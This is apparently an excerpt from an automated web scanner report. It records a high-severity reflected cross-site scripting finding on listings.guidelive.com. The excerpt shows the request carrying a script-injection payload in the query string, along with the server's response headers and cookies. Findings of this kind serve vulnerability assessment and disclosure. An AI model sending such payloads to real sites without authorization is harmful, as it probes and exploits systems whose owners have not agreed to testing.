1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://listings.guidelive |
Path: | / |
GET /?feba3"><script>alert(1)< Host: listings.guidelive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 03 Jan 2012 02:29:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 OK X-Rack-Cache: miss X-HTTP_CLIENT_IP_O: 174.36.218.2 X-Runtime: 59 ETag: "f2789a6c358e4025b3e Z-DETECTED-FLAVOR: listings_flavor | Z-REQUEST-HANDLED-BY: www25 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: user_of_classic Set-Cookie: welcome=JdQgUp4J8v9g Set-Cookie: zvents_tracker_sid Set-Cookie: _zsess=BAh7CCIXZXh0Z Content-Length: 63357 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equi ...[SNIP]... <meta property="og:url" content="http://www ...[SNIP]... |